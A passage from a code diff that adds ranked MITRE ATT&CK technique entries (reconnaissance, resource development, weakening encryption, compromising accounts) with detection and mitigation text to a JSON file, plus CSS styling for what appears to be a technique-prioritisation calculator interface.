"M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "subtechniques": [ + { + "tid": "T1589.001", + "name": "Gather Victim Identity Information: Credentials", + "description": "Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.\nAdversaries may gather credentials from potential victims in various ways, such as direct elicitation via Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: Search Engines, breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Compromise Accounts), and/or initial access (ex: External Remote Services or Valid Accounts).", + "url": "https://attack.mitre.org/techniques/T1589/001", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1589.002", + "name": "Gather Victim Identity Information: Email Addresses", + "description": "Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.\nAdversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Email Accounts), and/or initial access (ex: Phishing).", + "url": "https://attack.mitre.org/techniques/T1589/002", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1589.003", + "name": "Gather Victim Identity Information: Employee Names", + "description": "Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.\nAdversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Compromise Accounts), and/or initial access (ex: Phishing or Valid Accounts).", + "url": "https://attack.mitre.org/techniques/T1589/003", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ] + }, + { + "rank": 183, + "tid": "T1600", + "name": "Weaken Encryption", + "description": "Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as Modify System Image, Reduce Key Space, and Disable Crypto Hardware, an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)", + "url": "https://attack.mitre.org/techniques/T1600", + "detection": "There is no documented method for defenders to directly identify behaviors that weaken encryption. Detection efforts may be focused on closely related adversary behaviors, such as Modify System Image. Some detection methods require vendor support to aid in investigation.", + "score": 0.05, + "mitigations": [], + "subtechniques": [ + { + "tid": "T1600.001", + "name": "Weaken Encryption: Reduce Key Space", + "description": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)\nAdversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.\nAdversaries may modify the key size used and other encryption parameters using specialized commands in a Network Device CLI introduced to the system through Modify System Image to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)", + "url": "https://attack.mitre.org/techniques/T1600/001", + "detection": "There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as Modify System Image and Network Device CLI. Some detection methods require vendor support to aid in investigation.", + "mitigations": [] + }, + { + "tid": "T1600.002", + "name": "Weaken Encryption: Disable Crypto Hardware", + "description": "Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.\nMany network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of Modify System Image, forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., Reduce Key Space). (Citation: Cisco Blog Legacy Device Attacks)", + "url": "https://attack.mitre.org/techniques/T1600/002", + "detection": "There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as Modify System Image and Network Device CLI. Some detection methods require vendor support to aid in investigation.", + "mitigations": [] + } + ] + }, + { + "rank": 184, + "tid": "T1583", + "name": "Acquire Infrastructure", + "description": "Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.\nUse of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.", + "url": "https://attack.mitre.org/techniques/T1583", + "detection": "Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. \nOnce adversaries have provisioned infrastructure (ex: a server for use in command and control), internet scans may help proactively discover adversary acquired infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "score": 0.05, + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "subtechniques": [ + { + "tid": "T1583.001", + "name": "Acquire Infrastructure: Domains", + "description": "Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\nAdversaries can use purchased domains for a variety of purposes, including for Phishing, Drive-by Compromise, and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via Drive-by Compromise. Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)\nDomain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)", + "url": "https://attack.mitre.org/techniques/T1583/001", + "detection": "Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.(Citation: ThreatConnect Infrastructure Dec 2020)\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1583.002", + "name": "Acquire Infrastructure: DNS Server", + "description": "Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: Application Layer Protocol). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.\nBy running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic (DNS). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)", + "url": "https://attack.mitre.org/techniques/T1583/002", + "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1583.003", + "name": "Acquire Infrastructure: Virtual Private Server", + "description": "Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.\nAcquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)", + "url": "https://attack.mitre.org/techniques/T1583/003", + "detection": "Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1583.004", + "name": "Acquire Infrastructure: Server", + "description": "Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party Server or renting a Virtual Private Server, adversaries may opt to configure and run their own servers in support of operations.\nAdversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)", + "url": "https://attack.mitre.org/techniques/T1583/004", + "detection": "Once adversaries have provisioned a server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1583.005", + "name": "Acquire Infrastructure: Botnet", + "description": "Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale Phishing or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)", + "url": "https://attack.mitre.org/techniques/T1583/005", + "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Phishing, Endpoint Denial of Service, or Network Denial of Service.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1583.006", + "name": "Acquire Infrastructure: Web Services", + "description": "Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control (Web Service) or Exfiltration Over Web Service. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.", + "url": "https://attack.mitre.org/techniques/T1583/006", + "detection": "Once adversaries leverage the web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control (Web Service) or Exfiltration Over Web Service.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ] + }, + { + "rank": 185, + "tid": "T1594", + "name": "Search Victim-Owned Websites", + "description": "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: Email Addresses). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)\nAdversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Technical Databases), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Trusted Relationship or Phishing).", + "url": "https://attack.mitre.org/techniques/T1594", + "detection": "Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.", + "score": 0.05, + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "subtechniques": [] + }, + { + "rank": 186, + "tid": "T1586", + "name": "Compromise Accounts", + "description": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. Establish Accounts), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \nA variety of methods exist for compromising accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\nAdversaries may directly leverage compromised email accounts for Phishing for Information or Phishing.", + "url": "https://attack.mitre.org/techniques/T1586", + "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Phishing).", + "score": 0.05, + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "subtechniques": [ + { + "tid": "T1586.001", + "name": "Compromise Accounts: Social Media Accounts", + "description": "Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. Social Media Accounts), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \nA variety of methods exist for compromising social media accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\nAdversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service).", + "url": "https://attack.mitre.org/techniques/T1586/001", + "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1586.002", + "name": "Compromise Accounts: Email Accounts", + "description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct Phishing for Information or Phishing. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: Domains).\nA variety of methods exist for compromising email accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.", + "url": "https://attack.mitre.org/techniques/T1586/002", + "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Phishing).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ] + }, + { + "rank": 187, + "tid": "T1593", + "name": "Search Open Websites/Domains", + "description": "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\nAdversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Technical Databases), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: External Remote Services or Phishing).", + "url": "https://attack.mitre.org/techniques/T1593", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "score": 0.05, + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "subtechniques": [ + { + "tid": "T1593.001", + "name": "Search Open Websites/Domains: Social Media", + "description": "Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.\nAdversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. Spearphishing Service).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Technical Databases), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Spearphishing via Service).", + "url": "https://attack.mitre.org/techniques/T1593/001", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1593.002", + "name": "Search Open Websites/Domains: Search Engines", + "description": "Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\nAdversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Technical Databases), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Valid Accounts or Phishing).", + "url": "https://attack.mitre.org/techniques/T1593/002", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ] + }, + { + "rank": 188, + "tid": "T1612", + "name": "Build Image on Host", + "description": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)\nAn adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize Deploy Container using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. ", + "url": "https://attack.mitre.org/techniques/T1612", + "detection": "Monitor for unexpected Docker image build requests to the Docker daemon on hosts in the environment. Additionally monitor for subsequent network communication with anomalous IPs that have never been seen before in the environment that indicate the download of malicious code.", + "score": 0, + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ], + "subtechniques": [] + } +] diff --git a/src/index.css b/src/index.css index cf765e4..2737132 100644 --- a/src/index.css +++ b/src/index.css @@ -23,10 +23,17 @@ h1, h2, h3, h4, h5, h6 { @apply hover:text-ctid-light-purple text-lg; font-family: "Fira Sans Extra Condensed", sans-serif; } -.btn-primary { +.btn-primary-light { @apply bg-ctid-light-purple hover:bg-ctid-navy hover:text-white my-4 py-4 uppercase font-bold text-lg; font-family: "Fira Sans Extra Condensed", sans-serif; } +.btn-primary { + @apply bg-ctid-navy hover:bg-ctid-dark-navy text-white w-full p-4 text-center my-4 py-4 uppercase font-bold text-lg; +} + +#description a { + @apply text-ctid-blue hover:underline +} /* Navigation */ .navbar { @@ -47,6 +54,28 @@ h1, h2, h3, h4, h5, h6 { .hero .title h1 { @apply uppercase text-6xl font-semibold lg:my-auto } +/* Calculator */ +.calculator-details { + @apply border-ctid-black border-[1px] +} +.container { + @apply border-[1px] h-full border-ctid-black text-left lg:my-0 my-2 +} +.container-header { + @apply py-4 px-6 +} +.container-header { + @apply bg-ctid-navy text-white font-medium uppercase text-lg +} +.container h2 { + @apply uppercase text-xl w-full +} +.container-row { + @apply lg:flex gap-4 my-8 +} +.checkbox-group { + @apply w-full my-4 flex gap-4 +} /* Primevue Overrides */ .p-tabmenu .p-tabmenu-nav .p-tabmenuitem .p-menuitem-link { @@ -55,16 +84,61 @@ h1, h2, h3, h4, h5, h6 { } .p-tabmenu .p-menuitem-link { @apply bg-ctid-navy uppercase text-white hover:text-ctid-light-purple; - font-family: "Roboto Condensed", sans-serif; + font-family: "Fira Sans Extra Condensed", sans-serif; } .p-menubar .p-menuitem-link, .p-menubar { @apply uppercase font-medium ; font-family: "Fira Sans Extra Condensed", sans-serif; - } .p-menuitem-text { @apply my-2 } +.p-accordion-tab { + @apply rounded-none shadow-none border-[1px] border-ctid-black -mt-[1px] +} +.p-accordion-header { + @apply uppercase +} +.p-accordion-tab .p-highlight, .p-highlight .p-accordion-header-link { + @apply bg-ctid-navy text-white +} +.p-accordion-header-link { + @apply p-4 +} +.p-accordion-tab h2, .p-accordion-tab h4 { + @apply uppercase font-semibold +} +.p-accordion-tab h2 .highlight, .p-accordion-tab h4 .highlight { + @apply mx-1 +} +.p-accordion-tab-active h2 .highlight, .subtechniques .p-accordion-tab-active h4 .highlight { + @apply text-ctid-light-purple +} +.p-accordion { + @apply border-collapse +} +.p-accordion-tab { + @apply rounded-none shadow-none border-[1px] border-ctid-black +} +.p-accordion-header-text { + @apply uppercase font-semibold text-lg; + font-family: "Fira Sans Extra Condensed", sans-serif; +} +.p-checkbox-box { + @apply border-[1px] border-ctid-black rounded-none +} +.p-checkbox.p-highlight, .p-highlight .p-checkbox-box { + @apply bg-ctid-navy +} +.p-selectbutton .p-button.p-component { + @apply uppercase border-[1px] border-ctid-black rounded-none mx-1 +} +.p-selectbutton .p-highlight.p-button.p-component { + @apply bg-ctid-navy text-white +} +.p-tooltip-text { + @apply bg-ctid-light-purple/80 text-ctid-black +} .p-tabmenu-ink-bar { @apply 